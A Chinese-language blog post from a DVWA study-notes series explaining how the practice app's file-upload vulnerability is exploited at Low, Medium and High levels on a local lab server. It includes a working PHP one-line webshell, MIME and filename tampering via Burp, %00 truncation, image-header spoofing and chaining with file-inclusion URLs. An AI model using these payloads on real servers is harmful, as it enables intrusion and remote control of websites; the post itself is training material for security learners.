DVWA-File Upload(文件上传)

本系列文集:DVWA学习笔记

文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。

###Low:clipboard.png

函数介绍:
basename()函数返回路径中的文件名部分。
string basename ( string $path [, string $suffix ] )

参数介绍:
$path:必需。规定要检查的路径。在Windows中,斜线(/)和反斜线(\)都可以用作目录分隔符。在其它环境下是斜线(/)。
$suffix:可选。规定文件扩展名。如果文件有suffix,则不会输出这个扩展名。

举例:
<?php $path = "/testweb/home.php"; //显示带有文件扩展名的文件名 echo basename($path); //显示不带有文件扩展名的文件名 echo basename($path,".php"); ?>

输出:
home.php home
文件上传漏洞的利用的条件:
 1.能够成功上传木马文件
 2.上传文件必须能够被执行
 3.上传文件的路径必须可知

漏洞利用
因为对于上面的利用条件全都满足,直接上传文件x.php(一句话木马)
<?php @eval($_POST['x']);?>
clipboard (1).png

上传成功得到路径:
http://127.0.0.1/DVWA-1.9/hackable/uploads/x.php 密码为_POST['x']中的x
菜刀连接:就可以操控文件夹,干坏事了
clipboard (2).png

clipboard (3).png

###Medium:

clipboard (4).png

分析:
Medium的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过 100000B(约为 97.6KB)
普通上传一个php文件时,出现报错提示:

clipboard (5).png

漏洞利用
1.抓包修改文件类型
上传x.png文件,使用Burpsuite抓包:

clipboard (6).png

clipboard (7).png

可以看到文件类型为image/png,尝试修改filename为x.php,clipboard (8).png
上传成功:

clipboard (10).png
上传后成功得到x.php文件:

clipboard (9).png

菜刀连接:http://127.0.0.1/hackable/uploads/x.php
2.%00 截断上传绕过
在php版本小于 5.3.4 的服务器中,当magic_quote_gpc选项为off时,可以在文件名中使用%00截断,所以可以把上传文件命名为x.php%00.png。
180320195942.png
可以看到,包中的文件类型为image/png,可以通过文件类型检查。点击上传后:

180320195412.png

服务器会认为其文件名为x.php,顺势解析为php文件。
菜刀连接:http://127.0.0.1/hackable/uploads/x.php.png
180320184800.png

3.文件上传+文件包含
因为采用的是一句话木马,所以文件大小符合要求,至于文件类型的检查,尝试修改文件名为x.png,上传成功:
180320101057.png

但不能解析识别出是PHP文件,菜刀连接报错。
此时我们想到文件包含漏洞的利用。这里可以借助Medium 的文件包含漏洞来获取webshell权限,利用方式如下:
本地文件包含:成功读取x.png文件内容
http://127.0.0.1/vulnerabilities/fi/?page=D:/phpStudy/PHPTutorial/WWW/hackable/uploads/x.png
远程文件包含:
http://127.0.0.1/vulnerabilities/fi/?page=hthttp://tp://127.0.0.1/hackable/uploads/x.png
成功获取webshell权限:
180320184800 (1).png

两种方式,菜刀均可以成功连接。adandinclude.png

###High:

clipboard (11).png

strrpos()函数:

strrpos(string,find,start)

函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索。

strtolower()函数:

strtolower(string)

把字符串转换为小写。

getimagesize()函数:

getimagesize(string filename)

getimagesize()函数用于获取图像大小及相关信息,成功则返回一个数组,失败则返回FALSE并产生一条E_WARNING级的错误信息。

函数详细参考:
PHP strrpos() 函数
PHP getimagesize 函数
分析:
High的代码读取文件名中最后一个”.”后的字符串,通过文件名来限制文件类型因此要求上传文件名形式必须是*.jpg、.jpeg 、.png三者之一。getimagesize()函数更是限制了上传文件的文件头必须为图像类型。
Exploit
利用思路主要是:绕过getimagesize()函数检测识别和上传文件名的检测识别
让getimagesize()函数检测无效的方法:文件头欺骗,继而使得getimagesize()函数无法判断。

文件头相关的知识:

常见的图片格式的文件头标识如下:
JPEG/JPG - 文件头标识 (2 bytes): FF D8 (SOI) (JPEG 文件标识) - 文件结束标识 (2 bytes): FF D9 (EOI) 

PNG - 文件头标识 (8 bytes) :  89 50 4E 47 0D 0A 1A 0A

GIF - 文件头标识 (6 bytes) :  47 49 46 38 39(37) 61 

更多文件头标识参见文章:通过文件头标识判断图片格式

文件头欺骗:伪造文件头,使文件头标识一样,其它部分我们修改为一句话木马,也就成了我们常说的图片一句话。

常见的图片一句话制作方法:
先用C32Asm十六进制模式打开y.png,然后将x.php拖入,然后另存为z.png
180320220559.png
之后,我们将制作好的图片一句话,用getimagesize()函数识别测试,并与原图片文件对比,打印输出:

<?php

header("Content-type: text/html; charset=utf-8"); 

echo "y.png:";

$array0 = getimagesize("images/y.png");
print_r($array0);

echo "<br />";

echo "copy 命令制作的图片一句话 z1.png:";

$array1 = getimagesize("images/z1.png");
print_r($array1);

echo "C32Asm 制作的图片一句话 z2.png:";

$array2 = getimagesize("images/z2.png");
print_r($array2);
?>

以上是打印输出的file.php文件。

180321075814.png

我们发现得到的数组内容没有丝毫改变,
从而证明了该方法可以绕过getimagesize()函数的检测识别。接着我们再来进行利用:

1.%00 截断上传绕过
采用%00截断的方法可以轻松绕过文件名的检查,采用刚才的图片一句话进行上传。(适用于php小于 5.3.4 版本)
菜刀连接:http://127.0.0.1/hackable/uploads/z.php%00.png

2.文件上传 + 文件包含
通过上传图片一句话和借助High的文件包含漏洞来进行利用:
菜刀连接:
http://127.0.0.1/vulnerabilities/fi/?page=file:///D:/phpStudy/PHPTutorial/WWW/hackable/uploads/z.png

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值